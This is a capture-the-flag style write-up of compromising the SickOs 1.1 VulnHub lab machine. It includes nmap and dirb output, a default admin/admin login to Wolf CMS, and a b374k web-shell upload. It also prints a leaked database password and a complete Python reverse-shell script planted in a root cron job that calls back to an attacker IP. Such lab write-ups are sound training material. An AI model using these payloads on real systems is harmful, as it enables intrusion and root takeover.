SickOs1.1 Writeup

Here is a quick write up for SickOs.1.1 from the vulnhub.com site
https://www.vulnhub.com/entry/sickos-11,132/
Created by D4rk

Run a quick NMAP scan to see what we have to work with.
nmap -Pn 192.168.18.146

Starting Nmap 6.40 ( http://nmap.org ) at 2015-12-08 06:35 PST
Nmap scan report for 192.168.18.146
Host is up (0.0044s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy

The squid proxy port looks interesting.  So configure my browser to use the proxy. Once configured I am able to access the internet. Let try accessing the local IP through the proxy.

creenshot

Ok not much to go on here looking at the source of the page show no clues.
Lets run a quick directory scan using dirb and see if anything interesting shows up.

dirb http://192.168.18.146 /pentest/intelligence-gathering/dictionary/Discovery/Web_Content/common.txt -p 192.168.18.146:3128

—————–
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Tue Dec  8 07:12:14 2015
URL_BASE: http://192.168.18.146/
WORDLIST_FILES: /pentest/intelligence-gathering/dictionary/Discovery/Web_Content/common.txt
PROXY: 192.168.18.146:3128

—————–

GENERATED WORDS: 4592

—- Scanning URL: http://192.168.18.146/ —-
+ http://192.168.18.146/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.18.146/connect (CODE:200|SIZE:109)
+ http://192.168.18.146/index (CODE:200|SIZE:21)
+ http://192.168.18.146/index.php (CODE:200|SIZE:21)
+ http://192.168.18.146/robots (CODE:200|SIZE:45)
+ http://192.168.18.146/robots.txt (CODE:200|SIZE:45)
+ http://192.168.18.146/server-status (CODE:403|SIZE:295)

—————–
END_TIME: Tue Dec  8 07:12:17 2015
DOWNLOADED: 4592 – FOUND: 7

check out robots

User-agent: *
Disallow: /
Dissalow: /wolfcms

/woldcms looks interesting opening in a browser shows.

creenshot 2

I have never heard of wolfcms. Check out expoit-db and I see some vulnerabilities but most seem to require an authenticated user.  So let download the source for wolfcms to see the file structure. From the source I see several directories such as images etc. Looking around those nothing exciting shows up. So we bring up the admin login page determined from the source code.

creenshot 3

Just try the common admin/admin and we are in.

creenshot 4

Now lets see if we can upload my preferred PHP shell b37k to get CLI access. Lets put it in the images directory

creenshot 5

Now lets see if we can access the newly uploaded file.

creenshot 6

We are now in as the www-data user. From the b37k I create a reverse shell back to my self to obtain shell access.

/tmp# nc -lvp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from [192.168.18.146] port 6666 [tcp/*] accepted (family 2, sport 33912)
b374k shell : connected
/bin/sh: 0: can’t access tty; job control turned off
/tmp>ls
b374k_rs
b374k_rs.c
/tmp>whoami
www-data
/tmp>uname -a
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
/tmp>

lets look at services and see if anything stands out.

/var/www>ps -aux
Warning: bad ps syntax, perhaps a bogus ‘-‘? See http://procps.sf.net/faq.html
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   3536  1892 ?        Ss   20:30   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S    20:30   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    20:30   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   20:30   0:00 [kworker/0:0H]
root         7  0.0  0.0      0     0 ?        S    20:30   0:00 [migration/0]
root         8  0.0  0.0      0     0 ?        S    20:30   0:00 [rcu_bh]
root         9  0.0  0.0      0     0 ?        S    20:30   0:00 [rcu_sched]
root        10  0.0  0.0      0     0 ?        S    20:30   0:00 [watchdog/0]
root        11  0.0  0.0      0     0 ?        S<   20:30   0:00 [khelper]
root        12  0.0  0.0      0     0 ?        S    20:30   0:00 [kdevtmpfs]
root        13  0.0  0.0      0     0 ?        S<   20:30   0:00 [netns]
root        14  0.0  0.0      0     0 ?        S<   20:30   0:00 [writeback]
root        15  0.0  0.0      0     0 ?        S<   20:30   0:00 [kintegrityd]
root        16  0.0  0.0      0     0 ?        S<   20:30   0:00 [bioset]
root        17  0.0  0.0      0     0 ?        S<   20:30   0:00 [kworker/u17:0]
root        18  0.0  0.0      0     0 ?        S<   20:30   0:00 [kblockd]
root        19  0.0  0.0      0     0 ?        S<   20:30   0:00 [ata_sff]
root        20  0.0  0.0      0     0 ?        S    20:30   0:00 [khubd]
root        21  0.0  0.0      0     0 ?        S<   20:30   0:00 [md]
root        22  0.0  0.0      0     0 ?        S<   20:30   0:00 [devfreq_wq]
root        23  0.0  0.0      0     0 ?        S    20:30   0:00 [kworker/0:1]
root        25  0.0  0.0      0     0 ?        S    20:30   0:00 [khungtaskd]
root        26  0.0  0.0      0     0 ?        S    20:30   0:00 [kswapd0]
root        27  0.0  0.0      0     0 ?        SN   20:30   0:00 [ksmd]
root        28  0.0  0.0      0     0 ?        SN   20:30   0:00 [khugepaged]
root        29  0.0  0.0      0     0 ?        S    20:30   0:00 [fsnotify_mark]
root        30  0.0  0.0      0     0 ?        S    20:30   0:00 [ecryptfs-kthrea]
root        31  0.0  0.0      0     0 ?        S<   20:30   0:00 [crypto]
root        43  0.0  0.0      0     0 ?        S<   20:30   0:00 [kthrotld]
root        45  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_0]
root        46  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_1]
root        49  0.0  0.0      0     0 ?        S<   20:30   0:00 [dm_bufio_cache]
root        69  0.0  0.0      0     0 ?        S<   20:30   0:00 [deferwq]
root        70  0.0  0.0      0     0 ?        S<   20:30   0:00 [charger_manager]
root        71  0.0  0.0      0     0 ?        S    20:30   0:00 [kworker/0:2]
root       213  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_2]
root       214  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_3]
root       215  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_4]
root       217  0.0  0.0      0     0 ?        S<   20:30   0:00 [mpt_poll_0]
root       222  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_5]
root       223  0.0  0.0      0     0 ?        S<   20:30   0:00 [mpt/0]
root       224  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_6]
root       226  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_7]
root       228  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_8]
root       229  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_9]
root       230  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_10]
root       233  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_11]
root       234  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_12]
root       235  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_13]
root       236  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_14]
root       237  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_15]
root       238  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_16]
root       239  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_17]
root       240  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_18]
root       241  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_19]
root       242  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_20]
root       243  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_21]
root       244  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_22]
root       245  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_23]
root       246  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_24]
root       247  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_25]
root       248  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_26]
root       249  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_27]
root       250  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_28]
root       251  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_29]
root       252  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_30]
root       253  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_31]
root       283  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_32]
root       374  0.0  0.0      0     0 ?        S    20:30   0:00 [jbd2/sda1-8]
root       375  0.0  0.0      0     0 ?        S<   20:30   0:00 [ext4-rsv-conver]
root       376  0.0  0.0      0     0 ?        S<   20:30   0:00 [ext4-unrsv-conv]
root       470  0.0  0.0   2832   608 ?        S    20:30   0:00 upstart-udev-bridge –daemon
root       473  0.0  0.1   3100  1332 ?        Ss   20:30   0:00 /sbin/udevd –daemon
102        559  0.0  0.0   3256   888 ?        Ss   20:30   0:00 dbus-daemon –system –fork –activation=upstart
syslog     563  0.0  0.1  30164  1580 ?        Sl   20:30   0:00 rsyslogd -c5
root       574  0.0  0.0      0     0 ?        S<   20:30   0:00 [ttm_swap]
root       641  0.0  0.0   2976   764 ?        S    20:30   0:00 /sbin/udevd –daemon
root       642  0.0  0.0   3096   880 ?        S    20:30   0:00 /sbin/udevd –daemon
root       710  0.0  0.0      0     0 ?        S<   20:30   0:00 [kpsmoused]
root       769  0.0  0.0   2844   348 ?        S    20:30   0:00 upstart-socket-bridge –daemon
root       849  0.0  0.0   2924   404 ?        Ss   20:30   0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0
root       895  0.0  0.2   6680  2408 ?        Ss   20:30   0:00 /usr/sbin/sshd -D
root      1016  0.0  0.0   4628   844 tty4     Ss+  20:30   0:00 /sbin/getty -8 38400 tty4
root      1021  0.0  0.0   4628   844 tty5     Ss+  20:30   0:00 /sbin/getty -8 38400 tty5
root      1028  0.0  0.0   4628   844 tty2     Ss+  20:30   0:00 /sbin/getty -8 38400 tty2
root      1029  0.0  0.0   4628   848 tty3     Ss+  20:30   0:00 /sbin/getty -8 38400 tty3
root      1036  0.0  0.0   4628   856 tty6     Ss+  20:30   0:00 /sbin/getty -8 38400 tty6
proxy     1061  0.0  1.4  40200 15124 ?        Ss   20:30   0:02 /usr/sbin/squid3 -N -YC -f /etc/squid3/squid.conf
root      1062  0.0  0.0   2172   624 ?        Ss   20:30   0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
root      1063  0.0  0.0   2616   932 ?        Ss   20:30   0:00 cron
daemon    1064  0.0  0.0   2468   352 ?        Ss   20:30   0:00 atd
whoopsie  1084  0.0  0.3  24468  3768 ?        Ssl  20:30   0:00 whoopsie
mysql     1107  0.0  3.3 326184 33976 ?        Ssl  20:30   0:01 /usr/sbin/mysqld
proxy     1125  0.0  0.0   3220   612 ?        Ss   20:30   0:00 (unlinkd)
root      1136  0.0  0.7  37900  7656 ?        Ss   20:30   0:00 /usr/sbin/apache2 -k start
www-data  1172  0.0  0.7  38864  7776 ?        S    20:30   0:00 /usr/sbin/apache2 -k start
www-data  1174  0.0  0.9  39804 10020 ?        S    20:30   0:00 /usr/sbin/apache2 -k start
root      1185  0.0  0.0   4628   848 tty1     Ss+  20:30   0:00 /sbin/getty -8 38400 tty1
www-data  1379  0.0  0.9  40024  9548 ?        S    20:43   0:00 /usr/sbin/apache2 -k start
www-data  1550  0.0  0.8  39768  9052 ?        S    21:36   0:00 /usr/sbin/apache2 -k start
root      1554  0.0  0.0      0     0 ?        S    21:37   0:00 [kworker/u16:1]
www-data  1596  0.0  0.9  40304  9656 ?        S    21:48   0:00 /usr/sbin/apache2 -k start
www-data  1597  0.0  0.8  40412  8552 ?        S    21:48   0:00 /usr/sbin/apache2 -k start
www-data  1602  0.0  0.9  40812 10188 ?        S    21:48   0:00 /usr/sbin/apache2 -k start
www-data  1614  0.0  0.9  41964 10224 ?        S    21:49   0:00 /usr/sbin/apache2 -k start
www-data  1615  0.0  1.0  41312 10532 ?        S    21:49   0:00 /usr/sbin/apache2 -k start
www-data  1616  0.0  0.8  40412  8644 ?        S    21:49   0:00 /usr/sbin/apache2 -k start
root      1666  0.0  0.0      0     0 ?        S    21:55   0:00 [kworker/u16:0]
www-data  1690  0.0  0.0   2232   544 ?        S    22:00   0:00 sh -c export TERM=xterm;PS1=’$PWD>’;export PS1;/bin/sh -i
www-data  1691  0.0  0.0   2232   284 ?        S    22:00   0:00 /bin/sh -i
root      1694  0.0  0.0      0     0 ?        S    22:00   0:00 [kworker/u16:2]
www-data  1695  0.0  0.0   2232   540 ?        S    22:00   0:00 sh -c export TERM=xterm;PS1=’$PWD>’;export PS1;/bin/sh -i
www-data  1696  0.0  0.0   2232   280 ?        S    22:00   0:00 /bin/sh -i
www-data  1767  0.0  0.0   2232   540 ?        S    22:01   0:00 sh -c ./b374k_rs 13123 2>&1
www-data  1768  0.0  0.0   2000   284 ?        S    22:01   0:00 ./b374k_rs 13123
www-data  1775  0.0  0.0   2232   544 ?        S    22:03   0:00 sh -c export TERM=xterm;PS1=’$PWD>’;export PS1;/bin/sh -i
www-data  1776  0.0  0.0   2232   560 ?        S    22:03   0:00 /bin/sh -i
www-data  1790  0.0  0.1   2860  1044 ?        R    22:05   0:00 ps -aux

woopsie looks odd.

Lets take a look at the wolfcms config file.
cat config.php
<?php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define(‘DB_DSN’, ‘mysql:dbname=wolf;host=localhost;port=3306’);
define(‘DB_USER’, ‘root’);
define(‘DB_PASS’, ‘john@123’);
define(‘TABLE_PREFIX’, ”);

Nice looking through the mysql tables nothing interesting pops out. Tried the root password via SSH with no luck. So lets look around a bit.

see a file in /var/www called connect.py
#!/usr/bin/python

print “I Try to connect things very frequently\n”
print “You may want to try my services”

Well that looks like a clue. Lets look for something that could launch this like cron.

found a file under /etc/cron.d called automate that runs the connect.py as root.

* * * * * root /usr/bin/python /var/www/connect.py
Lets edit the file to see if we can get a reverse shell via the root user.

Modified automate

#!/usr/bin/python

import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect((“192.168.18.181”,1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call([“/bin/sh”,”-i”]);

 

now start nc listener

nc -lvp 1234
Listening on [0.0.0.0] (family 0, port 1234)

Connection from [192.168.18.146] port 1234 [tcp/*] accepted (family 2, sport 34262)
/bin/sh: 0: can’t access tty; job control turned off
# # ls
a0216ea4d51874464078c618298b1367.txt
# whoami
root
# cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying

this was a lot of fun thanks for creating D4rk!

Leave a Reply